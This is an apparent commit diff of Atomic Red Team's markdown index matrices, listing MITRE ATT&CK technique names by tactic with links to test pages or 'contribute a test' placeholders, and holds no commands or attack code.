| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | |
| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Port Monitors](../../T1547.010/T1547.010.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Rc.common](../../T1037.004/T1037.004.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Rc.common](../../T1037.004/T1037.004.md) | [Security Support Provider](../../T1547.005/T1547.005.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Startup Items](../../T1037.005/T1037.005.md) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | [Screensaver](../../T1546.002/T1546.002.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Trap](../../T1546.005/T1546.005.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Windows Service](../../T1543.003/T1543.003.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Trap](../../T1546.005/T1546.005.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
| | | [Windows Service](../../T1543.003/T1543.003.md) | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
| | | | | [Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
| | | | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
| | | | | [Run Virtual Instance](../../T1564.006/T1564.006.md) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rundll32](../../T1218.011/T1218.011.md) | | | | | | | |
| | | | | [SID-History Injection](../../T1134.005/T1134.005.md) | | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | | | | | | | |
| | | | | [Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
| | | | | [Signed Binary Proxy Execution](../../T1218/T1218.md) | | | | | | | |
| | | | | [Signed Script Proxy Execution](../../T1216/T1216.md) | | | | | | | |
| | | | | [Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
| | | | | [Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | |
| | | | | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Template Injection](../../T1221/T1221.md) | | | | | | | |
| | | | | Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
atomics/Indexes/Matrices/windows-matrix.md
+95 -112
View File
@@ -1,131 +1,114 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [AS-REP Roasting](../../T1558.004/T1558.004.md) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Add-ins](../../T1137.006/T1137.006.md) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Archive via Utility](../../T1560.001/T1560.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
